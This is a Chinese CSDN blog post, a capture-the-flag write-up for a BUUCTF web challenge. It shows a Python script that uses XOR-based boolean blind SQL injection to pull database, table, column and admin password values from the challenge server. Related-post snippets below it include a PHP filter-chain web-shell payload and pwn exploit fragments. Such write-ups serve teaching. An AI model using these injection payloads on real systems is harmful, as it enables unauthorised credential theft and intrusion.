BUUCTF--[Black Watch 入群题]Web

最新推荐文章于 2023-03-11 11:30:03 发布
最新推荐文章于 2023-03-11 11:30:03 发布
阅读量916 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/119059485
版权

 登录时使用burp suite抓包发现是以json传入的数据

 进去之后我们发现单击这三个热点分别会有以下三种响应, 因为id=1,所以这里是一个整形注入

 

异或布尔盲注

异或'^'是一种数学运算,1^1=0 0^0=0 1^0=0,可以用来进行sql注入,当两条件相同时(同真同假)结果为假,当两条件不同时(一真一假)结果为真。

他返回的是json的格式,我们进行json转换后,还得将它转为字符串,才能正确找到

import requests

flag=''
#查库名
payload1 = '1^(ascii(substr((select(database())),{},1))>{})^1'    #库名为news

#查表名
payload2 = '1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=\'news\')),{},1))>{})^1' #表名为admin,contents

#查字段
payload3 = '1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=\'contents\')),{},1))>{})^1'   #admin表里有id,username,password,is_enable
                                                                                                                                              # contents表里有id,title,content,is_enable

#查字段值
payload4 = '1^(ascii(substr((select(group_concat(password))from(admin)),{},1))>{})^1'    #分别查username和password



for i in range(1,100):
    low =28
    high =137
    mid = (low + high) // 2

    while(low < high):
        url = 'http://0d352472-9f4a-461c-8f07-cebbce1df9e8.node4.buuoj.cn/backend/content_detail.php?id='
        payload = payload4.format(i,mid)
        url+=payload
        print(url)
        r = requests.get(url)
        text = str(r.json())

        if "札师傅缺个女朋友" in text:
            low = mid + 1
        else:
            high = mid

        mid = (low + high) // 2

    if(chr(mid)==''):
        break
    flag +=chr(mid)
    print(flag)

print(flag)

#这个代码使用了id=1时的情况,使用了二分法提高了查询的速度

 使用查询到的第二个帐号和密码登录即可获得flag

Uzero.
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
bsf.rar_Black-Scholes_black scholes_formula
09-19
evaluates the Black-Scholes formula for a European call
[Black Watch ]Web
shinygod的博客
04-12 630
知识点:盲注 在这边抓个包 可以看到有个php文件 经过测试发现异或盲注可以 直接exp import time import re import requests import string url = "http://f32ba0ff-a985-43d9-8921-862260b1b16b.node4.buuoj.cn:81/backend/content_detail.php" flag = '' def payload(i, j): time.sleep(0.2) #
buuctf [Black Watch ]PWN
qq_42728977的博客
04-10 632
本来想着栈溢出简简单单,然后发现竟然没见过这知识点,堆迁移。 看雪链接
七月刷总结
qq_46263951的博客
07-30 450
本月在BUUCTF平台共刷400解以下40道,通过刷学到了很多知识和思路,以下将会把在每道中学到的知识列举出来,也方便之后的复习。 BUUCTF--BUU UPLOAD COURSE 1 文件上传,通过测试是一个文件包含漏洞,即使后缀名被更改,php代码依然可以被执行。 BUUCTF--[watevrCTF-2019]Cookie Store Cookie中包含着我们的信息,更改Cookie中的金额即可。 这里可以做一个小结:一般需要我们购买但钱又不够的情况下,考点基本上就在于怎么来找到包含金.
Web-12(45-48)-BUUCTF平台
~airrudder~
08-02 427
本篇内容 [SWPU2019]Web1 [极客大挑战 2019]HardSQL [WesternCTF2018]shrine [BJDCTF 2nd]假猪套天下第一 上一篇 | 目录 | 下一篇 [SWPU2019]Web1 [极客大挑战 2019]HardSQL [WesternCTF2018]shrine [BJDCTF 2nd]假猪套天下第一 ======...
buu-day09
anwen12的博客
01-26 471
Day9-懒狗来打卡了 0x01 [WMCTF2020]Web Check in 2.0 绕过死亡exit,这是基本操作了,但是需要找到新的过滤器。懒狗想到这里就去看wp了。 =php://filter/zlib.deflate|string.tolower|zlib.inflate|?><?php%0deval($_GET[1]);?>/resource=6.php 还有一种方法是segment,就是那个qwb2021才考过的知识点。需要爆破,就不多说了 0x02 [CISCN2019
(第三周)
qq_62046696的博客
03-11 711
sess_根我们生成的sha256编码,上传进去了,还差那个文件是否存在,发现upload有mkdir(里面的就是/var/babyctf/$attr)这里的attr我们可以控制,目录!简单来说,file_exits,如果是文件目录都可以为true,文件上传保存在/var/babyctf/$attr/$username/文件名,如果attr=success.txt,那么sess就保存在它里面,最后更改phpsessID为我们上传的sha256的值。变成我们的flag不就可以了吗。s:3:"123";
栈迁移学习(buuctf [Black Watch ])
像初雪一样自由洒落
03-14 964
i春秋的borrowstack是栈迁移和万能gadget的混合,,,然后writeup看的不是很明白,也没有很细的解析,所以,emmm,应该是自己栈迁移学的不是很好,只是知道大概的意思,但是还没有做过,这次在看雪看到文章,就好好学一下,做到啦!! 栈迁移,我觉得比较好理解,如果试过将调用一个函数过程好好自己试过的话,知道控制ebp,可以控制函数的去向,详细可以看看这篇图示:https://b...
NotoSansSC-Black.otf
03-30
NotoSansSC-Black.otf
http,ftp,mail服务器架设为一体软件
05-28
首先,我们先来了解一下花生壳的到底有什么作用。因为ADSL每次拨号上网所获得的IP地址每次都是不同的,花生壳起到的作用就是方便用户访问我们的服务 器(只需要输域名便可),而不用每次都输IP地址那么麻烦(因为我们也不可能每次重新拨号上网后,又去告诉用户现在的服务器的IP地址什么)。<br><br>例如,我们的花生壳护照下有一个域名www.oray.net ,那么只要在电脑上用该护照登陆了花生壳客户端。当别人输www.oray.net的时候,会自动解析到那台电脑所在的网络的公网IP地址。<br><br>也就是说,具体的服务器,是要我们自己去设置完成的。而不同的上网方式,建立服务器的方式是不同的,下面介绍两种常见上网方法的服务器的建立。(这两个上网方法主要区别在于用来做服务器的计算机,能否得到公网的IP地址)。<br>
bitnami-docker-blackbox-exporter:用于Blackbox_exporter的Bitnami Docker映像
04-08
$ docker run --name blackbox-exporter bitnami/blackbox-exporter:latest 为什么要使用Bitnami Images? Bitnami密切跟踪上游源代码变化,并使用我们的自动化系统及时发布该图像的新版本。 对于Bitnami映像,将...
snickerdoodle-black:Snickerdoodle Black项目
05-07
士力架黑色 根据您的工具版本签出分支
求解欧式看跌期权的 Black-Scholes 方程
05-27
本例求解欧式看跌期权的 Black-Scholes 方程。Black 和 Scholes 开发了求解的解析表达式。 仿真文件下载https://download.csdn.net/download/yjw0911/85473273
CTF刷-汇总
热门推荐
~airrudder~
04-09 1万+
BUUCTF平台的刷之旅 Web
[Black Watch ]PWN(栈迁移)
qq_39869547的博客
02-06 931
栈迁移主要解决溢出空间不足的问, 前提条件知道欲迁移位置的地址。 from LibcSearcher import * from PwnContext.core import * binary = './spwn' debug_libc = './libc-2.23.so' elf = ELF(binary) libc = ELF(debug_libc) local = 1 if local ...
[Black Watch ]PWN
、moddemod
06-20 356
利用bss进行栈迁移 exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level='debug') proc_name = './spwn' p = process(proc_name) # p = remote('node3.buuoj.cn', 29482) elf = ELF(proc_name) write_plt = elf.plt['wri.
BUUCTF-[Black Watch ]PWN
Fzuim的博客
04-14 363
常规检查下来,发现可以进行栈溢出,但是允许操作的空间只有8个字节… 看下ida伪代码 可操作空间很小,只能覆盖到eip,正常思路是:泄露write的got表地址,然后通过libcsearch找出system和bin/sh的地址,再次构造栈溢出攻击。此目栈溢出只能操作8字节,一般思路行不通。此时就用到另一个概念:栈迁移!!! 栈迁移的关键点在于esp,能把esp重新指向另外一块内存空间,即可成功。这的另一块内存空间就是bss段。 利用到栈迁移,我们需要在原本栈的eip位置覆盖成 leave;r.
BUU刷记录——4
weixin_43610673的博客
08-31 1601
[HarekazeCTF2019]Avatar Uploader 1 finfo_file用来判断上传图片类型,getimagesize可以判断文件像素大小,并且再进行一次类型判断。 finfo_file函数应该是直接打开文件,来获取文件类型。而getimagesize函数是通过图片尺寸数组中第三个元素是否为int型的3来判断的。 finfo_file 可以识别 png 图片( 十六进制下 )的第一行,而 getimagesize 不可以。 所以我们只要保持png头就可以,将他的相符判断
text-xl text-black
最新发布
07-15
"text-xl" 和 "text-black" 是常用的 CSS 类名,用于设置文本的样式。 "text-xl" 是一个用于设置文本大小的类名,通常表示较大的字号。在不同的框架或样式库中,具体的大小可能会有所不同,但通常表示比常规文本要大一些的字号。 "text-black" 是一个用于设置文本颜色的类名,表示使用黑色作为文本的颜色。同样,在不同的框架或样式库中,具体的颜色值可能会有所不同,但通常表示使用纯黑色(#000000)作为文本颜色。 通过将这两个类名应用到相应的 HTML 元素上,可以实现文本大小为较大,并且颜色为黑色的效果。例如: ```html <p class="text-xl text-black">这是一段较大且黑色的文本。</p> ``` 需要注意的是,具体的样式定义和效果可能会因为使用的框架或样式库而有所差异,请根据自己使用的环境进行相应的调整。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值